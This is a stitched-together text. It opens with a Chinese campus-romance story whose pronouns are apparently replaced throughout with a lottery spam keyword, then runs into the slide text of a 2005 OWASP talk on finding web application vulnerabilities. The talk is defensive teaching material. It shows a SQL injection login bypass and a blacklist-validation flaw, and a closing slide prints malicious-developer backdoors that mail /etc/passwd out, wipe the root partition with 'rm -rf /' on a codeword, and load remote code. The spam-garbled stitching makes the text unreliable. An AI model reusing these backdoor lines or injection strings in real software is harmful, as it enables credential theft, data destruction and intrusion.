香港六合彩
DESCRIPTION
王峰不太愿意提子允和周晨晨的那种关系,结果还是触碰了,唉,别人的情网也法力无边。但事已至此,不好过分,作为好朋友,关键的时候怎么也该撑场子。那去就是,为了弟兄哪怕被王秀粘上四辈子也心甘,但你注意,我的灯泡很亮,菲利普2500瓦,够亮吧?我是它两个亮。没事,我本身光明正大,而且身上还背着发电机的。你老弟可要当心,别因为短路把身体给烧糊了。没事,那我就可以在烈火中永生了。《Y滋味》显文具店里中午放学后,四人汇聚到校门口边上的文具店里。显然两位女士没想到王峰会来,吃了一小惊。这又给了王秀展示厉害的机会,尽管香港六合彩平日与王峰不大熟,此时却搞得像三十年的老相识。哟,你也来啦?好啊,人多热闹。说完侧过脸坏笑着看子允,只不过赵大财主又要多破费了。子允跟王峰相视一笑,对香港六合彩说,如果钱不够,留下你给老板的儿子做童养媳。去,去,去,把晨晨留下差不多。哎,正经点儿,去哪吃饭?王秀向每个人扫一遍,一句话问了三个人。去麦当劳。王峰说。麦当劳吧。周晨晨跟道。我随便。子允的声音显得很突出。三个人很配合,被王秀这么一问,同时说出自己的想法。哎,香港六合彩两搞什么?回答得这么整齐?赵子允你可要小心了,王峰和晨晨很默契,强有力的竞争对手喔。王秀这句话很具煽动性,把王峰和晨晨弄得满脸通红。子允被牵其中,也红着脸不知看哪好。王秀,你说什么呀。周晨晨扯着香港六合彩的衣角小声责怪。就是,你这是挑拨香港六合彩兄弟感情,小心吃饭时王峰送你蹲厕所。子允趁机乱中添乱。打破混乱最好的方法就是让事情更混乱,子允一直这么认为。好,我同意,让香港六合彩吃不了兜着走。王峰扬起还在红着的脸,而且是在厕所吃不了兜着走。谈到厕所,女人最不好接招,王秀毫无还手之力,跟着傻笑。一般来说,一对一开损的时候不容易分出伯仲,如果二对一,那个一可就难有招架之力。假使三对一,那一的日子估计只有撕下脸自嘲一番才能逃过此劫。好了,既然两人都要去麦当劳,那香港六合彩抓紧时间吧,中午时间可不充裕。显然,子允对王秀的话很不在心,惦记着找机会用三对一的架式让香港六合彩乖巧一下嘴。到了麦当劳,子允和王峰主动担当起点餐任务,问清两位女生的需要后一起来到柜台排队点餐。周晨晨选了个靠窗的四人位子,然后单手托腮望着窗外卖红薯的老太太发呆。王秀则叽叽喳喳说终于敲诈到子允了。这头,子允正窃笑着王秀嘴大胃小,原以为香港六合彩真会让自己大把挥银,想不到香港六合彩只要了两对(又鸟)翅和一包大薯条,连饮料都是子允过意不去死活让香港六合彩要的。TRANSCRIPT
Copyright © 2004 - The OWASP FoundationPermission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License.
The OWASP Foundation
4th Annual NTC ISSA InfoSec Nashville Conference August 24, 2005
http://www.owasp.org
The Art of Finding Flaws – Techniques for Finding Vulnerabilities in Custom Software
Jeff WilliamsCEO, Aspect SecurityChair, OWASP [email protected]
2OWASP
The Future
Ingredients: Sun Java 1.5 runtime, Sun J2EE 1.2.2, Jakarta log4j 1.5, Jakarta Commons 2.1, Jakarta Struts 2.0, Harold XOM 1.1rc4, Hunter JDOMv1
Software Facts
Modules 155 Modules from Libraries 120
% Vulnerability*
* % Vulnerability values are based on typical use scenarios for this product. Your Vulnerability Values may be higher or lower depending on your software security needs:
Cross Site Scripting 22 65%
SQL Injection 2Buffer Overflow 5
Total Security Mechanisms 3
Encryption 3
Authentication 15
95%
Modularity .035
Cyclomatic Complexity 323
Access Control 3
Input Validation 233
Logging 33
Expected Number of Users 15Typical Roles per Instance 4
Reflected 12
Stored 10
Cross Site Scripting Less Than 10 5 Reflected Less Than 10 5 Stored Less Than 10 5SQL Injection Less Than 20 2Buffer Overflow Less Than 20 2Security Mechanisms 10 14 Encryption 3 15
Usage Intranet Internet
3OWASP
Today
Code is code All sectors All languages All platforms All computing models All sizes Intra/Extra/Inter-net
New types of vulnerabilities are rare
The market doesn’t value secure code
We trust code we shouldn’t
Cheaper, faster only
We don’t have any idea whether our code is trustworthy or not
4OWASP
Why Find Vulnerabilities?
Nobody believes their software is vulnerable“If the software works, then it must be secure”
Finding flaws starts you on the path
FindFlaws Fix Find
Flaws Improve FindFlaws Improve
If you’re not finding them, you’re allowing them
5OWASP
Software Is A Black Box
ComplexMillions of lines of codeLayers of leaky abstractionsMassively interconnected
CompiledDifficult to reverse engineerDifferent on every platform
Legal ProtectionsNo peekingWe’re not liable
6OWASP
Key Vulnerabilities
A few serious common vulnerabilities…Broken Access ControlWeak Authentication and Session ManagementSQL InjectionCross Site Scripting
For more information see… The Top Ten Most Critical Web Application Vulnerabilities
(www.owasp.org/documentation/topten.html)
A Guide to Building Secure Web Applications and Web Services (www.owasp.org/documentation/guide.html)
7OWASP
SQL Injection Illustrated
Fir
ewal
l
Hardened OS
Web Server
App ServerF
irew
all
Dat
abas
es
Leg
acy
Sys
tem
s
Web
Ser
vice
s
Dir
ecto
ries
Hu
man
Res
rcs
Bill
ing
Custom Code
APPLICATIONATTACK
Net
wo
rk L
ayer
Ap
plic
atio
n L
ayer
Acc
ou
nts
Fin
ance
Ad
min
istr
atio
n
Tra
nsa
ctio
ns
Co
mm
un
icat
ion
Kn
ow
led
ge
Mg
mt
E-C
om
mer
ce
Bu
s. F
un
ctio
ns
HTTP
requestSQL
queryDB
Table
HTTP
response
“SELECT * FROM users WHERE user=‘’ OR
1=1--’ AND pass=‘password’”
1. Application presents a login form to the attacker
2. Attacker sends an attack in the form data
3. Application forwards attack to the database in a SQL query
Successful Login“Welcome, Alice”
4. Database runs query containing attack and sends results to application
5. Application thinks login worked and sends welcome page
8OWASP
Scanning for SQL Injection
MethodUse “signatures” to send malformed SQL
commandsAnalyze responses to see if it “worked”Nessus, nikto, absinthe
ProsRequires only network access to applicationFast and easy to run
ConsMay only exercise part of an applicationProne to false alarms and missed positivesResults indicate URL but not line of codeCan be problems with credentials, roles, and SSL
9OWASP
Static Analysis for SQL Injection
MethodAutomatically analyze source code for patternsTools load source code, compile, and analyze
ProsRequires only the software baselineFast and easy to run
ConsCan’t factor in the runtime environmentProne to false alarms and missed positivesResults indicate line of code but not URLDoesn’t find design problems
10OWASP
Penetration Testing for SQL Injection
MethodCustom attacks by an expert security testerUse OWASP WebScarab to craft custom attacksExpert analyzes responses to see if attack worked
ProsOpen source tools availableRecommend an internal team
ConsRequires expertise in security, software, and SQLDifficult to exercise the entire applicationTester may not be able to determine success
11OWASP
Code Review for SQL Injection
MethodReviewer analyzes code for patternsUse tools to view baseline in different waysExamine mechanisms, common vulnerability
areas
ProsCost-effectiveCan examine the entire baseline
ConsCan’t factor in the runtime environmentRequires skills in software and security
12OWASP
Security Analysis Techniques
Find Vulnerabilities Using the Running Application
Find Vulnerabilities Using the Source Code
AutomatedAutomatedVulnerabilityVulnerabilityScanningScanning
AutomatedAutomatedStatic CodeStatic Code
AnalysisAnalysis
ManualManualPenetrationPenetrationTestingTesting
ManualManualCodeCode
ReviewReview
Combining All Four Techniques is Most Effective
13OWASP
Vulnerability Patternspublic class DamagedStrutsForm extends ActionForm{public void doForm( HttpServletRequest request) {
UserBean u = session.getUserBean();u.setName(request.getParameter("name"));u.setFavoriteColor(request.getParameter("color"));
}
public boolean validate( HttpServletRequest request) {try {
if ( request.getParameter("Name").indexOf("<scri") != -1 ) {logger.log("Script detected" );return false;
}}catch( Exception e ) {}return true;
}}
Failure to Validate
Blacklist Validation
Fail Open
Failure to Validate
Time of Check, Time of Use
Failure to Validate
14OWASP
A Change In Perspective
Think like an attacker!Understand how the application worksEspecially the security mechanismsHow does the application make security decisions
The easy part?Test and analyze for a single vulnerability
The hard part?Do an entire application for all types of
vulnerabilities
15OWASP
Getting Started
Adopt the OWASP Top TenSet the bar
Spot check a few applicationsAre your security mechanisms easy to
understand?Are you doing validation, error handling, logging,
etc?
Get security out in the open!
Come to my talk later to find out more!!!
16OWASP
OWASP Can Help
Open Web Application Security ProjectNonprofit FoundationAll materials available under approved open
source licensesDozens of projects, over 50 chapters
worldwide, thousands of participants, and millions of hits a month
OWASP is dedicated to finding and fighting the causes of insecure software
17OWASP
OWASP Supports Vulnerability Analysis
OWASP Top Ten Set priorities, get management buy-in
OWASP Guide 300 page book for application security
OWASP Testing Guide Test/analysis methods for application security
OWASP WebScarab Web application & web service penetration tool
18OWASP
Some of What You’ll Find at OWASP
Community Local Chapters Translations Conferences Mailing Lists Papers and more…
All free and open source We encourage your
company to support us by becoming a member
Documentation Guide Top Ten Testing Legal AppSec FAQ and more…
Tools WebGoat WebScarab Stinger DotNet and more…
19OWASP
What Could a Malicious Developer Do?
Trojan Horse runs for adminif ( System.getCurrentUser().getName().equals( “admin” ) ) Runtime.exec( “sendmail [email protected] < /etc/passwd” );
Secret trigger removes all files on root partitionif( req.getParameter( “codeword” ).equals( “eagle” ) ) Runtime.exec( “rm –rf /” );
Randomly corrupt data one time in 100if ( Math.random() < .01 ) bean.setValue( “corrupt” );
Load and execute code from remote server((A)(ClassLoader.getSystemClassLoader().defineClass (null,readBytesFromNetwork(),0,422).newInstance())).attack();
Make backdoor look like inadvertent mistakeif ( input < 0 ) throw new RuntimeException( “Input error” );
Impossible to tell malicious from mistake
Who wrote the libraries your application uses?
OWASP
AQ&Q U E S T I O N SQ U E S T I O N S
A N S W E R SA N S W E R S
Q&A